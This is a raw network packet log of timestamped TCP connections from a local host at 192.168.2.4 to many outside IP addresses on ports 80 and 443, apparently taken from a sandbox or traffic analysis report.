Mar 28, 2024 09:14:58.480170965 CET	49744	80	192.168.2.4	104.21.36.53
Mar 28, 2024 09:14:58.481156111 CET	80	49740	93.186.225.194	192.168.2.4
Mar 28, 2024 09:14:58.481230021 CET	49740	80	192.168.2.4	93.186.225.194
Mar 28, 2024 09:14:58.483684063 CET	49744	80	192.168.2.4	104.21.36.53
Mar 28, 2024 09:14:58.483774900 CET	80	49745	172.67.180.119	192.168.2.4
Mar 28, 2024 09:14:58.483855009 CET	80	49745	172.67.180.119	192.168.2.4
Mar 28, 2024 09:14:58.483901024 CET	49745	80	192.168.2.4	172.67.180.119
Mar 28, 2024 09:14:58.484195948 CET	80	49745	172.67.180.119	192.168.2.4
Mar 28, 2024 09:14:58.484230042 CET	49745	80	192.168.2.4	172.67.180.119
Mar 28, 2024 09:14:58.484905005 CET	80	49741	93.186.225.194	192.168.2.4
Mar 28, 2024 09:14:58.484954119 CET	49741	80	192.168.2.4	93.186.225.194
Mar 28, 2024 09:14:58.486896992 CET	80	49746	104.21.42.248	192.168.2.4
Mar 28, 2024 09:14:58.487093925 CET	49748	80	192.168.2.4	104.21.36.53
Mar 28, 2024 09:14:58.487303019 CET	49740	80	192.168.2.4	93.186.225.194
Mar 28, 2024 09:14:58.487430096 CET	49745	80	192.168.2.4	172.67.180.119
Mar 28, 2024 09:14:58.487679005 CET	49749	80	192.168.2.4	172.67.180.119
Mar 28, 2024 09:14:58.489371061 CET	49741	80	192.168.2.4	93.186.225.194
Mar 28, 2024 09:14:58.556776047 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:58.556799889 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:58.556937933 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:58.557683945 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:58.565072060 CET	80	49742	18.205.93.0	192.168.2.4
Mar 28, 2024 09:14:58.569668055 CET	80	49747	18.205.93.0	192.168.2.4
Mar 28, 2024 09:14:58.569770098 CET	49747	80	192.168.2.4	18.205.93.0
Mar 28, 2024 09:14:58.570158005 CET	49747	80	192.168.2.4	18.205.93.0
Mar 28, 2024 09:14:58.578995943 CET	80	49744	104.21.36.53	192.168.2.4
Mar 28, 2024 09:14:58.581645966 CET	80	49748	104.21.36.53	192.168.2.4
Mar 28, 2024 09:14:58.581659079 CET	80	49745	172.67.180.119	192.168.2.4
Mar 28, 2024 09:14:58.581753969 CET	49748	80	192.168.2.4	104.21.36.53
Mar 28, 2024 09:14:58.581810951 CET	80	49749	172.67.180.119	192.168.2.4
Mar 28, 2024 09:14:58.581862926 CET	49749	80	192.168.2.4	172.67.180.119
Mar 28, 2024 09:14:58.582138062 CET	49748	80	192.168.2.4	104.21.36.53
Mar 28, 2024 09:14:58.582164049 CET	49749	80	192.168.2.4	172.67.180.119
Mar 28, 2024 09:14:58.585668087 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:58.585975885 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:58.585988045 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:58.586045027 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:58.586437941 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:58.589720011 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:58.589777946 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:58.589956045 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:58.593893051 CET	49750	80	192.168.2.4	45.130.41.108
Mar 28, 2024 09:14:58.623020887 CET	80	49738	176.113.115.135	192.168.2.4
Mar 28, 2024 09:14:58.623037100 CET	80	49738	176.113.115.135	192.168.2.4
Mar 28, 2024 09:14:58.623049974 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:58.623097897 CET	49738	80	192.168.2.4	176.113.115.135
Mar 28, 2024 09:14:58.623198032 CET	49738	80	192.168.2.4	176.113.115.135
Mar 28, 2024 09:14:58.623687983 CET	49751	80	192.168.2.4	176.113.115.135
Mar 28, 2024 09:14:58.623862982 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:58.623924971 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:58.624111891 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:58.664916039 CET	80	49747	18.205.93.0	192.168.2.4
Mar 28, 2024 09:14:58.664935112 CET	80	49747	18.205.93.0	192.168.2.4
Mar 28, 2024 09:14:58.664948940 CET	80	49747	18.205.93.0	192.168.2.4
Mar 28, 2024 09:14:58.664997101 CET	49747	80	192.168.2.4	18.205.93.0
Mar 28, 2024 09:14:58.665273905 CET	49747	80	192.168.2.4	18.205.93.0
Mar 28, 2024 09:14:58.665637016 CET	49752	80	192.168.2.4	18.205.93.0
Mar 28, 2024 09:14:58.667639017 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:58.667721033 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:58.668072939 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:58.677140951 CET	80	49748	104.21.36.53	192.168.2.4
Mar 28, 2024 09:14:58.677176952 CET	80	49748	104.21.36.53	192.168.2.4
Mar 28, 2024 09:14:58.677182913 CET	80	49749	172.67.180.119	192.168.2.4
Mar 28, 2024 09:14:58.677223921 CET	80	49749	172.67.180.119	192.168.2.4
Mar 28, 2024 09:14:58.677227020 CET	49748	80	192.168.2.4	104.21.36.53
Mar 28, 2024 09:14:58.677273035 CET	49749	80	192.168.2.4	172.67.180.119
Mar 28, 2024 09:14:58.677402020 CET	80	49748	104.21.36.53	192.168.2.4
Mar 28, 2024 09:14:58.677413940 CET	80	49749	172.67.180.119	192.168.2.4
Mar 28, 2024 09:14:58.677433968 CET	49748	80	192.168.2.4	104.21.36.53
Mar 28, 2024 09:14:58.677433968 CET	49748	80	192.168.2.4	104.21.36.53
Mar 28, 2024 09:14:58.677481890 CET	49748	80	192.168.2.4	104.21.36.53
Mar 28, 2024 09:14:58.677485943 CET	49749	80	192.168.2.4	172.67.180.119
Mar 28, 2024 09:14:58.677555084 CET	49749	80	192.168.2.4	172.67.180.119
Mar 28, 2024 09:14:58.677736998 CET	49753	80	192.168.2.4	104.21.36.53
Mar 28, 2024 09:14:58.677896976 CET	49754	80	192.168.2.4	172.67.180.119
Mar 28, 2024 09:14:58.694875002 CET	49755	80	192.168.2.4	130.164.189.20
Mar 28, 2024 09:14:58.696155071 CET	80	49740	93.186.225.194	192.168.2.4
Mar 28, 2024 09:14:58.696168900 CET	80	49740	93.186.225.194	192.168.2.4
Mar 28, 2024 09:14:58.696180105 CET	80	49740	93.186.225.194	192.168.2.4
Mar 28, 2024 09:14:58.696239948 CET	49740	80	192.168.2.4	93.186.225.194
Mar 28, 2024 09:14:58.696239948 CET	49740	80	192.168.2.4	93.186.225.194
Mar 28, 2024 09:14:58.696429968 CET	49740	80	192.168.2.4	93.186.225.194
Mar 28, 2024 09:14:58.697010040 CET	49756	80	192.168.2.4	93.186.225.194
Mar 28, 2024 09:14:58.700150013 CET	80	49741	93.186.225.194	192.168.2.4
Mar 28, 2024 09:14:58.700164080 CET	80	49741	93.186.225.194	192.168.2.4
Mar 28, 2024 09:14:58.700186968 CET	80	49741	93.186.225.194	192.168.2.4
Mar 28, 2024 09:14:58.700226068 CET	49741	80	192.168.2.4	93.186.225.194
Mar 28, 2024 09:14:58.700226068 CET	49741	80	192.168.2.4	93.186.225.194
Mar 28, 2024 09:14:58.706445932 CET	49741	80	192.168.2.4	93.186.225.194
Mar 28, 2024 09:14:58.706873894 CET	49757	80	192.168.2.4	93.186.225.194
Mar 28, 2024 09:14:58.732774019 CET	80	49746	104.21.42.248	192.168.2.4
Mar 28, 2024 09:14:58.732831955 CET	49746	80	192.168.2.4	104.21.42.248
Mar 28, 2024 09:14:58.735409975 CET	49758	443	192.168.2.4	104.21.42.248
Mar 28, 2024 09:14:58.735459089 CET	443	49758	104.21.42.248	192.168.2.4
Mar 28, 2024 09:14:58.735529900 CET	49758	443	192.168.2.4	104.21.42.248
Mar 28, 2024 09:14:58.735814095 CET	49758	443	192.168.2.4	104.21.42.248
Mar 28, 2024 09:14:58.735826969 CET	443	49758	104.21.42.248	192.168.2.4
Mar 28, 2024 09:14:58.741055965 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:58.741074085 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:58.741127968 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:58.741127014 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:58.741143942 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:58.741158962 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:58.741178036 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:58.741182089 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:58.741226912 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:58.741236925 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:58.741252899 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:58.741261005 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:58.741293907 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:58.741309881 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:58.741329908 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:58.741344929 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:58.741374969 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:58.741388083 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:58.760685921 CET	80	49747	18.205.93.0	192.168.2.4
Mar 28, 2024 09:14:58.770483017 CET	80	49752	18.205.93.0	192.168.2.4
Mar 28, 2024 09:14:58.770509005 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:58.770555973 CET	49752	80	192.168.2.4	18.205.93.0
Mar 28, 2024 09:14:58.770991087 CET	49752	80	192.168.2.4	18.205.93.0
Mar 28, 2024 09:14:58.771472931 CET	80	49748	104.21.36.53	192.168.2.4
Mar 28, 2024 09:14:58.771862984 CET	80	49749	172.67.180.119	192.168.2.4
Mar 28, 2024 09:14:58.771877050 CET	80	49753	104.21.36.53	192.168.2.4
Mar 28, 2024 09:14:58.771938086 CET	80	49754	172.67.180.119	192.168.2.4
Mar 28, 2024 09:14:58.771945000 CET	49753	80	192.168.2.4	104.21.36.53
Mar 28, 2024 09:14:58.771977901 CET	49754	80	192.168.2.4	172.67.180.119
Mar 28, 2024 09:14:58.772408962 CET	49759	443	192.168.2.4	18.205.93.0
Mar 28, 2024 09:14:58.772447109 CET	443	49759	18.205.93.0	192.168.2.4
Mar 28, 2024 09:14:58.772485018 CET	49759	443	192.168.2.4	18.205.93.0
Mar 28, 2024 09:14:58.773056030 CET	49759	443	192.168.2.4	18.205.93.0
Mar 28, 2024 09:14:58.773067951 CET	443	49759	18.205.93.0	192.168.2.4
Mar 28, 2024 09:14:58.773168087 CET	49753	80	192.168.2.4	104.21.36.53
Mar 28, 2024 09:14:58.774127960 CET	49760	443	192.168.2.4	104.21.36.53
Mar 28, 2024 09:14:58.774154902 CET	443	49760	104.21.36.53	192.168.2.4
Mar 28, 2024 09:14:58.774204016 CET	49760	443	192.168.2.4	104.21.36.53
Mar 28, 2024 09:14:58.774353027 CET	49754	80	192.168.2.4	172.67.180.119
Mar 28, 2024 09:14:58.775177956 CET	49761	443	192.168.2.4	172.67.180.119
Mar 28, 2024 09:14:58.775196075 CET	443	49761	172.67.180.119	192.168.2.4
Mar 28, 2024 09:14:58.775258064 CET	49761	443	192.168.2.4	172.67.180.119
Mar 28, 2024 09:14:58.775710106 CET	49760	443	192.168.2.4	104.21.36.53
Mar 28, 2024 09:14:58.775723934 CET	443	49760	104.21.36.53	192.168.2.4
Mar 28, 2024 09:14:58.776154041 CET	49761	443	192.168.2.4	172.67.180.119
Mar 28, 2024 09:14:58.776168108 CET	443	49761	172.67.180.119	192.168.2.4
Mar 28, 2024 09:14:58.792095900 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:58.792103052 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:58.792124987 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:58.792136908 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:58.792144060 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:58.792155027 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:58.792166948 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:58.792170048 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:58.792226076 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:58.792232990 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:58.792244911 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:58.792257071 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:58.792264938 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:58.792290926 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:58.797394037 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:58.797458887 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:58.797684908 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:58.827635050 CET	80	49750	45.130.41.108	192.168.2.4
Mar 28, 2024 09:14:58.827707052 CET	49750	80	192.168.2.4	45.130.41.108
Mar 28, 2024 09:14:58.828104019 CET	49750	80	192.168.2.4	45.130.41.108
Mar 28, 2024 09:14:58.835849047 CET	80	49738	176.113.115.135	192.168.2.4
Mar 28, 2024 09:14:58.838044882 CET	80	49751	176.113.115.135	192.168.2.4
Mar 28, 2024 09:14:58.838104963 CET	49751	80	192.168.2.4	176.113.115.135
Mar 28, 2024 09:14:58.838248014 CET	49751	80	192.168.2.4	176.113.115.135
Mar 28, 2024 09:14:58.842612028 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:58.842617989 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:58.842678070 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:58.857372046 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:58.857400894 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:58.857423067 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:58.857445002 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:58.861124039 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:58.861140966 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:58.861155033 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:58.861167908 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:58.861180067 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:58.861181021 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:58.861203909 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:58.861210108 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:58.861222982 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:58.861253023 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:58.861264944 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:58.861284018 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:58.861289024 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:58.861296892 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:58.861320019 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:58.861344099 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:58.861344099 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:58.861356974 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:58.861386061 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:58.861393929 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:58.865663052 CET	80	49752	18.205.93.0	192.168.2.4
Mar 28, 2024 09:14:58.865705967 CET	49752	80	192.168.2.4	18.205.93.0
Mar 28, 2024 09:14:58.867938042 CET	80	49753	104.21.36.53	192.168.2.4
Mar 28, 2024 09:14:58.868707895 CET	80	49753	104.21.36.53	192.168.2.4
Mar 28, 2024 09:14:58.868752956 CET	49753	80	192.168.2.4	104.21.36.53
Mar 28, 2024 09:14:58.868921995 CET	80	49754	172.67.180.119	192.168.2.4
Mar 28, 2024 09:14:58.868966103 CET	49754	80	192.168.2.4	172.67.180.119
Mar 28, 2024 09:14:58.872050047 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:58.872062922 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:58.872093916 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:58.872112989 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:58.886600971 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:58.886619091 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:58.886658907 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:58.901344061 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:58.901369095 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:58.901396990 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:58.901429892 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:58.905658960 CET	80	49740	93.186.225.194	192.168.2.4
Mar 28, 2024 09:14:58.911350965 CET	80	49756	93.186.225.194	192.168.2.4
Mar 28, 2024 09:14:58.911431074 CET	49756	80	192.168.2.4	93.186.225.194
Mar 28, 2024 09:14:58.911809921 CET	49756	80	192.168.2.4	93.186.225.194
Mar 28, 2024 09:14:58.915951967 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:58.916002989 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:58.917906046 CET	80	49741	93.186.225.194	192.168.2.4
Mar 28, 2024 09:14:58.920798063 CET	80	49757	93.186.225.194	192.168.2.4
Mar 28, 2024 09:14:58.920861959 CET	49757	80	192.168.2.4	93.186.225.194
Mar 28, 2024 09:14:58.921192884 CET	49757	80	192.168.2.4	93.186.225.194
Mar 28, 2024 09:14:58.924413919 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:58.924429893 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:58.924443007 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:58.924462080 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:58.924474955 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:58.924493074 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:58.924518108 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:58.924530029 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:58.924535036 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:58.924542904 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:58.924567938 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:58.924581051 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:58.924592972 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:58.924612999 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:58.924623013 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:58.924633980 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:58.924647093 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:58.924653053 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:58.924685001 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:58.924685001 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:58.924707890 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:58.924715042 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:58.924745083 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:58.924757957 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:58.924783945 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:58.924793005 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:58.924803019 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:58.924814939 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:58.924822092 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:58.924849033 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:58.924855947 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:58.924860954 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:58.924880028 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:58.924909115 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:58.924916029 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:58.924949884 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:58.937613964 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:58.937628031 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:58.937642097 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:58.937664032 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:58.937666893 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:58.937676907 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:58.937690020 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:58.937699080 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:58.937716007 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:58.937748909 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:58.937762022 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:58.937988043 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:58.937999010 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:58.938010931 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:58.938035965 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:58.938059092 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:58.938280106 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:58.938329935 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:58.938329935 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:58.938354969 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:58.938366890 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:58.938378096 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:58.938390970 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:58.938417912 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:58.938419104 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:58.938431025 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:58.938441992 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:58.938453913 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:58.938472033 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:58.938484907 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:58.939270973 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:58.939284086 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:58.939296961 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:58.939320087 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:58.939346075 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:58.939481020 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:58.939518929 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:58.939529896 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:58.939541101 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:58.939552069 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:58.939568996 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:58.940407991 CET	443	49758	104.21.42.248	192.168.2.4
Mar 28, 2024 09:14:58.940466881 CET	49758	443	192.168.2.4	104.21.42.248
Mar 28, 2024 09:14:58.943317890 CET	80	49755	130.164.189.20	192.168.2.4
Mar 28, 2024 09:14:58.943378925 CET	49755	80	192.168.2.4	130.164.189.20
Mar 28, 2024 09:14:58.943788052 CET	49755	80	192.168.2.4	130.164.189.20
Mar 28, 2024 09:14:58.946115971 CET	49758	443	192.168.2.4	104.21.42.248
Mar 28, 2024 09:14:58.946139097 CET	443	49758	104.21.42.248	192.168.2.4
Mar 28, 2024 09:14:58.946382999 CET	443	49758	104.21.42.248	192.168.2.4
Mar 28, 2024 09:14:58.946424961 CET	49758	443	192.168.2.4	104.21.42.248
Mar 28, 2024 09:14:58.946722984 CET	49758	443	192.168.2.4	104.21.42.248
Mar 28, 2024 09:14:58.992239952 CET	443	49758	104.21.42.248	192.168.2.4
Mar 28, 2024 09:14:58.997267962 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:58.997292042 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:58.997311115 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:58.997320890 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:58.997324944 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:58.997364044 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:58.997381926 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:58.997406006 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:58.997417927 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:58.997421980 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:58.997451067 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:58.997468948 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:58.997484922 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:58.997497082 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:58.997513056 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:58.997529984 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:58.997544050 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:58.997546911 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:58.997576952 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:58.997577906 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:58.997602940 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:58.997612000 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:58.997636080 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:58.997663975 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:58.997688055 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:58.997700930 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:58.997701883 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:58.997715950 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:58.997739077 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:58.997742891 CET	80	49734	195.20.16.46	192.168.2.4
